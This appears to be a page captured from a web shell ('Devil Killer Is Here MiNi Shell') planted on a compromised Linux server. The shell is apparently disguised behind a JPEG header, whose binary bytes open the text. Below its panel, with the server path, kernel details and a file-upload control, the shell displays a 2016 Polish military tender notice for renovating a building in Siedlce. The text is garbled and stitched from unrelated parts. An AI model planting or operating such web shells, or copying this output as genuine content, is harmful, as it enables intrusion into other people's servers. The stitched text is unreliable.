JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160725/155187-N-2016.html

<p class="kh_header"><b>Mińsk Mazowiecki: Remont budynku wielobranżowego nr 6 w kompleksie K-0951 w Siedlcach - Sprawa ZP/32/2016</b><br>
<b>Numer ogłoszenia: 155187 - 2016; data zamieszczenia: 25.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 23 Baza Lotnictwa Taktycznego , 05-300 Mińsk Mazowiecki, woj. mazowieckie, tel. 261 553 505, faks 261 553 520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.23blt.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku wielobranżowego nr 6 w kompleksie K-0951 w Siedlcach - Sprawa ZP/32/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont budynku wielobranżowego nr 6 K 0951 
Wykucie z muru parapetów betonowych z lastryko, demontaż skrzydła drzwi wejściowych do pomieszczenia, wykucie z muru ościeżnicy, powiększenie otworu drzwiowego i wstawienie nowych drzwi drewnianych sosnowych szer. 90 cm gr. 42 mm z ościeżnicami drewnianymi stałymi odpornymi na zawilgocenie,  drzwi i ościeżnica lakierowane dwukrotnie, zamek jednopunktowy na wkładkę, trzy zawiasy, uszczelka na całym obwodzie ościeżnicy, ługowanie farby olejnej z tynków ścian, przecieranie istniejących tynków wewnętrznych z zeskrobaniem farby na stropach, przecieranie istniejących tynków wewnętrznych z zeskrobaniem farby na ścianach, gruntowanie podłoży preparatami CERESIT CT 17 i ATLAS UNI GRUNT  powierzchnie poziome i pionowe, dwukrotne malowanie farbami emulsyjnymi powierzchni wewnętrznych  tynków gładkich bez gruntowania, dostawa i montaż parapetu z konglomeratu, cyklinowanie posadzek z desek, szpachlowanie i froterowanie posadzek z desek przed lakierowaniem, impregnacja ogniochronna desek preparatem impregnacyjnym i ogniochronnym Fobos M 4, lakierowanie posadzek z desek  trzykrotne lakierowanie lakierem bezbarwnym dwuskładnikowym poliuretanowym na bazie wody, wymiana listew przyściennych z drewna iglastego, impregnacja ogniochronna listew drewnianych przypodłogowych preparatem impregnacyjnym i ogniochronnym Fobos M 4, lakierowanie listew drewnianych przypodłogowych  trzykrotne lakierowanie lakierem bezbarwnym dwuskładnikowym poliuretanowym na bazie wody, demontaż i wstawienie wewnętrznych drzwi wraz z obróbką: Drzwi aluminiowe przymykowe dwuskrzydłowe o wym. 2.35x1,55 m z przegrodą termiczną, rama skrzydła i ościeżnicy wykonana z kształtowników aluminiowych. Jedno skrzydło szer. 100 cm + otwieralna dostawka szer. 55 cm Skrzydła w całości wypełnione panelem z blach aluminiowych. Rama skrzydła i ościeżnica oraz panel malowane są proszkowo w kolorze 
do ustalenia z Zamawiającym. Drzwi muszą posiadać uszczelnienie gumowe na całym obwodzie. Drzwi zaopatrzone w samozamykacz oraz stopkę do zabezpieczenia drzwi 
w pozycji otwartej, frezowanie starych podłoży betonowych, wykonanie samopoziomującego podkładu o grubości 4 mm na płytkach ceramicznych i lastryko układanego pompą, wykonanie posadzki typu Plastidur  epoksydowe - warstwy gruntujące przy posadzkach zbrojonych w pomieszczeniach, w których występuje działanie środowiska agresywnego, wykonanie posadzki typu Plastidur  epoksydowe przeciwślizgowe grubości 3 -5 mm, demontaż skrzydła drzwi wejściowych do pomieszczenia, wykucie z muru ościeżnicy, powiększenie otworu drzwiowego i wstawienie nowych drzwi drewnianych sosnowych szer. 90 cm gr. 42 mm z ościeżnicami drewnianymi stałymi odpornymi na zawilgocenie - drzwi 
i ościeżnica lakierowane dwukrotnie, zamek jednopunktowy na wkładkę, trzy zawiasy, uszczelka na całym obwodzie ościeżnicy, odbicie tynków wewnętrznych z zaprawy cementowo wapiennej na ścianach, filarach, pilastrach o powierzchni odbicia ponad 5 m2  pom. nr 10, rozebranie posadzki z płytek na zaprawie cementowej, wykonanie samopoziomującego podkładu podłogowego ATLAS SAM 200 na warstwie oddzielającej gr. 30 mm, rozebranie ścian, filarów i kolumn z cegieł na zaprawie cementowo wapiennej, wykonanie ściany budynków jednokondygnacyjnych o wysokości do 4.5 m z pustaków ceramicznych typu Max/220 grubości 39 cm, wykonanie podkładu betonowego z transportem i układaniem ręcznym na podłożu gruntowym, wykonanie izolacji przeciwwilgociowej 
i przeciwwodnej z folii polietylenowej szerokiej - poziome podposadzkowe, wykonanie warstwy wyrównawczej pod posadzki z zaprawy cementowej grubości 20 mm zatarte na ostro, wykonanie tynków wewnętrznych, wymiana okien zespolonych na okna uchylne jednodzielne z PCV o pow. ponad 1.0 m2, demontaż i wstawienie zewnętrznych drzwi wraz 
z obróbką: Drzwi aluminiowe przymykowe jednoskrzydłowe o wym. 2.15x1,85 m z przegrodą termiczną, rama skrzydła i ościeżnicy wykonana z kształtowników aluminiowych trzykomorowych z przegrodą termiczną o głębokości 60 [mm]. Jedno skrzydło szer. 100 cm
 + otwieralna dostawka szer. 85 cm Skrzydła w całości wypełnione panelem z blach aluminiowych ocieplone styropianem 30 mm. Rama skrzydła i ościeżnica oraz panel malowane są proszkowo w kolorze do ustalenia z Zamawiającym. Drzwi muszą posiadać uszczelnienie gumowe na całym obwodzie. Drzwi zaopatrzone w samozamykacz oraz stopkę do zabezpieczenia drzwi w pozycji otwartej, demontaż i wstawienie zewnętrznych drzwi wraz z obróbką: Drzwi aluminiowe przymykowe jednoskrzydłowe o wym. 2.0x0,9 m z przegrodą termiczną, rama skrzydła i ościeżnicy wykonana z kształtowników aluminiowych trzykomorowych z przegrodą termiczną o głębokości 60 [mm]. Skrzydło w całości wypełnione panelem z blach aluminiowych ocieplone styropianem 30 mm. Rama skrzydła 
i ościeżnica oraz panel malowane są proszkowo w kolorze do ustalenia z Zamawiającym. Drzwi muszą posiadać uszczelnienie gumowe na całym obwodzie. Drzwi zaopatrzone w samozamykacz oraz stopkę do zabezpieczenia drzwi w pozycji otwartej,  dostawa i montaż drabiny zewnętrznej z kabłąkiem o długości ponad 4 m, przemurowanie kominów z cegieł 
o objętości w jednym miejscu do 0.5 m3, rozbiórka betonowych czapek kominowych, wykonanie tynków zwykłych cementowo-wapiennych kat. III na kominach ponad dachem płaskim, uzupełnienie zbrojonych czapek kominowych z betonu monolitycznego, przygotowanie starego podłoża pod docieplenie metodą lekką-mokrą Dwukrotne gruntowanie emulsją ATLAS UNI GRUNT kominy, przyklejenie warstwy siatki na ścianach  kominy, wyprawa elewacyjna cienkowarstwowa z akrylowych tynków dekoracyjnych ATLAS CERMIT N 200 o fakturze nakrapianej lub R 200 o fakturze rustykalnej gr. 2 mm wykonana ręcznie na uprzednio przygotowanym podłożu Nałożenie podkładowej masy tynkarskiej Tynki na pow.do 5 m2.  kominy, wyprawa elewacyjna cienkowarstwowa z akrylowych tynków dekoracyjnych ATLAS CERMIT N 200 o fakturze nakrapianej lub R 200 o fakturze rustykalnej gr. 2 mm wykonana ręcznie na uprzednio przygotowanym podłożu  ściany płaskie i powierzchnie poziome tynki na pow. do 5 m2.
 Kominy, rozebranie rynien z blachy nie nadającej się do użytku, rozebranie rur spustowych z blachy nie nadającej się do użytku, wykonanie spadków pod obróbki blacharskie z zaprawy podokienniki, wykonanie obróbek blacharskich z blachy powlekanej o szer. w rozwinięciu ponad 25 cm - podokienniki, wypełnienie szczeliny styku podokiennika z ramą okna jednoskładnikową masą silikonową, wymiana pokrycia murów ogniowych, pasów pod
i nadrynnowych, wyskoków, pasów elewacyjnych, gzymsów i krawędzi balkonów z blachy ocynkowanej, montaż rynien dachowych z PCW łączonych na uszczelki półokrągłe o śr. 125 mm wraz z łącznikami rynien i lejami spustowymi, montaż rur spustowych z PCW okrągłych o śr. 90 mm wraz z kolankami spustowymi i złączami rur, rozbiórka pokrycia z papy 
na dachach betonowych, rozbiórka pokrycia z papy na dachach betonowych  kołnierze elementów metalowych, pokrycie dachów papą termozgrzewalną jednowarstwowe, naprawa pokryć dachowych papą termozgrzewalną  obróbki z papy kołnierze elementów metalowych, odbicie tynków zewnętrznych z zaprawy cementowo-wapiennej na ścianach, uzupełnienie tynków zewnętrznych cementowych, przygotowanie starego podłoża pod docieplenie metodą lekką-mokrą  dwukrotne gruntowanie emulsją ATLAS UNI GRUNT, ocieplenie ścian budynków płytami styropianowymi  system STOPTER  ochrona narożników wypukłych kątownikiem metalowym, ocieplenie ścian budynków płytami styropianowymi - system STOPTER  przyklejenie warstwy siatki na ścianach, wyprawa elewacyjna cienkowarstwowa z akrylowych tynków dekoracyjnych ATLAS CERMIT N 200 o fakturze nakrapianej lub R 200 o fakturze rustykalnej gr. 2 mm wykonana ręcznie 
na uprzednio przygotowanym podłożu - nałożenie podkładowej masy tynkarskiej, wyprawa elewacyjna cienkowarstwowa z akrylowych tynków dekoracyjnych ATLAS CERMIT N 200 o fakturze nakrapianej lub R 200 o fakturze rustykalnej gr. 2 mm wykonana ręcznie na uprzednio przygotowanym podłożu - ściany płaskie i powierzchnie poziome, mechaniczne wykonanie koryta głębokości 30 cm, wykonanie rowków, ławy z oporem pod obrzeża
i montaż obrzeży betonowych, wykonanie podbudowy z kruszywa łamanego, wykonanie opaski budynku z kostki brukowej betonowej 4 cm szarej, naprawa nawierzchni schodów
i obłożenie ich płytkami ceramicznymi mrozoodpornymi, mechaniczne rozebranie nawierzchni z mieszanek mineralno bitumicznych pod nawierzchnię z kostki betonowej, wykonanie koryta pod nawierzchnię z kostki betonowej, wykonanie ław z oporem pod krawężniki betonowe i montaż krawężników betonowych, wykonanie podbudowy z kruszyw łamanych, układanie nawierzchni  z kostki betonowej Behaton gr. 8 cm szarej.
Remont instalacji elektrycznej i odgromowej w budynku nr 6 K 0951 
INSTALACJA ODGROMOWA Demontaż wsporników naciągowych, demontaż zwodów poziomych, demontaż zwodów pionowych, montaż wsporników naciągowych, montaż zwodów poziomych, montaż zwodów pionowych, montaż złączy rynnowych i krzyżowych, montaż osłon przewodów uziemiających, wykonanie pomiarów sprawdzających instalacji odgromowej.

INSTALACJA ELEKTRYCZNA
Demontaż osprzętu instalacyjnego, demontaż opraw oświetleniowych, demontaż rozdzielni elektrycznej, montaż kanałów instalacyjnych typu BAKS pod stropem do rozprowadzenia instalacji elektrycznej, montaż kanałów instalacyjnych PCV, wykonanie instalacji elektrycznej, montaż rozdzielnicy R1 i R2 z wyposażeniem modułowym, montaż osprzętu instalacyjnego  wyłączniki, przełączniki, gniazda wtyczkowe 230V, gniazda 400V, montaż opraw świetlówkowych 2x36W o stopniu ochrony IP65, montaż opraw świetlówkowych 2x36W o stopniu ochrony IP65 z modułem awaryjnym 3h, montaż naświetlaczy LED o mocy 15 W i stopniu ochrony IP 67, wymiana przyłącz elektrycznego do budynku, montaż złącza kablowego z wyłącznikiem p.poż. do budynku, wykonanie pomiarów sprawdzających instalację elektryczną.
Wymiana posadzki w pom. 124 bud. 1 K 0799, wykonanie tynku mozaikowego 
w pomieszczeniu nr 1 bud. 28 K 6031 oraz tynku mozaikowego przy bramie wjazdowej 
na teren K 0799:
Rozebranie posadzek z wykładziny dywanowej, demontaż listew przyściennych z drewna liściastego, wykonanie posadzek z paneli podłogowych gr. 12 mm, klasa ścieralności AC6, zeskrobanie i zmycie starej farby, wykonanie gładzi gipsowe jednowarstwowe, grubości 3 mm, wykonywane ręcznie na ścianach, gruntowanie podłoży preparatami CERESIT CT 17 i ATLAS UNI GRUNT  powierzchnie pionowe, wykonanie tynków cienkowarstwowych na ścianach wykonane na mokro ręcznie z gotowych mieszanek  mozaikowa masa tynkarska, odbicie tynków zewnętrznych z zaprawy cementowo wapiennej na ścianach, rozbiórka betonowych czapek na ścianie ogrodzenia, wykonanie spadków pod dachówkę na ścianie ogrodzenia, wyłożenie wierzchu ściany ogrodzenia dachówką karpiówką pojedynczą, dwukrotne gruntowanie emulsją ATLAS UNI-GRUNT, ochrona narożników wypukłych kątownikiem metalowym, przyklejenie warstwy siatki, nałożenie podkładowej masy tynkarskiej, wykonanie tynków cienkowarstwowych na ścianach wykonane na mokro ręcznie z gotowych mieszanek  mozaikowa masa tynkarska  wykonanie cokołu o wysokości 
i kolorze takim jak jest na budynku nr 1 sztab, reszta ściany w kolorze elewacji budynku.
Szczegółowy zakres robót, jakie należy wykonać w ramach niniejszego zamówienia określają załączone do specyfikacji istotnych warunków zamówienia dokumenty, w szczególności: 
Specyfikacja techniczna wykonania i odbioru robót budowlanych STWiORB i opis przedmiotu zamówienia  załącznik 5 do SIWZ 
Przedmiar robót- załącznik nr 6 do SIWZ 
Szczegółowe warunki realizacji zamówienia określa Projekt umowy stanowiący załącznik nr 7 do SIWZ.
W przypadku wystąpienia w specyfikacjach technicznych wykonania i odbioru robót lub  w przedmiarach robót: nazw producenta, znaku towarowego, patentu, pochodzenia                w odniesieniu do wymaganych materiałów i urządzeń  Zamawiający zaleca, aby traktować takie wskazania jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów i urządzeń o równoważnych parametrach technicznych i funkcjonalnych, nie gorszych niż określone w dokumentacji oraz posiadających stosowne dopuszczenia, certyfikaty i aprobaty techniczne. 
Zastosowane materiały równoważne muszą odpowiadać cechom technicznym i jakościowym materiałów wskazanych w dokumentacji technicznej. Wykonawca, który powołuje się na rozwiązania równoważne opisane przez Zamawiającego w dokumentacji technicznej, zobowiązany jest wykazać że zastosowane materiały i roboty budowlane spełniają wymagania określone przez Zamawiającego  art. 30 ust. 5 ustawy Pzp..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 15 000,00 zł słownie złotych piętnaście tysięcy złotych i 00 100.
Wadium wnosi się przed upływem terminu składania ofert. Niewniesienie wadium 
w wymaganym terminie do upływu terminu składania ofert lub nie zabezpieczenie oferty ustawową formą wadium spowoduje, iż oferta nie będzie rozpatrywana, a Wykonawca zostanie wykluczony z postępowania o udzielenie zamówienia publicznego, zgodnie z art. 24 ust.2 pkt 2 ustawy Pzp, a jego oferta zgodnie z art. 24 ust. 4 Pzp zostanie uznana za odrzuconą.
Wadium można wnieść w formie:
pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt
2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007 r. Nr 42, poz. 275.
Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy zamawiającego: 
    85 1010 1010 0002 4413 9120 0000 z dopiskiem Wadium  Sprawa ZP 32 2016
Remont budynku wielobranżowego nr 6 w kompleksie K-0951
Pod pojęciem wniesienia wadium Zamawiający uznaje wpływ pieniędzy na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.
W przypadku wniesienia wadium w innej formie niż pieniądz Wykonawca dołącza do oferty kopię dokumentu stwierdzającego wniesienie wadium potwierdzoną za zgodność 
z oryginałem i załącza oryginał tego dokumentu w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty.
Zamawiający zwróci lub zatrzyma wadium zgodnie z postanowieniami art. 46 ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, którzy będą uczestniczyć w realizacji przedmiotu zamówienia, w tym: 
osoby posiadającą: 
uprawnienia SEP rodzaju D + E do 1kV
lub
uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 
Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane Dz. U. z 2013r. poz. 1409  tekst jednolity ze zmianami osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z ich treścią decyzji o ich nadaniu w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12 a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. W związku z powyższym, Zamawiający zaakceptuje uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy zgodny co do treści ze wzorem zawartym w zał. nr 1.
Kosztorys ofertowy sporządzony na podstawie Przedmiaru robót oraz zgodnie z Rozdziałem 12 SIWZ
Pełnomocnictwo osób podpisujących ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych oryginał lub kopia poświadczona notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
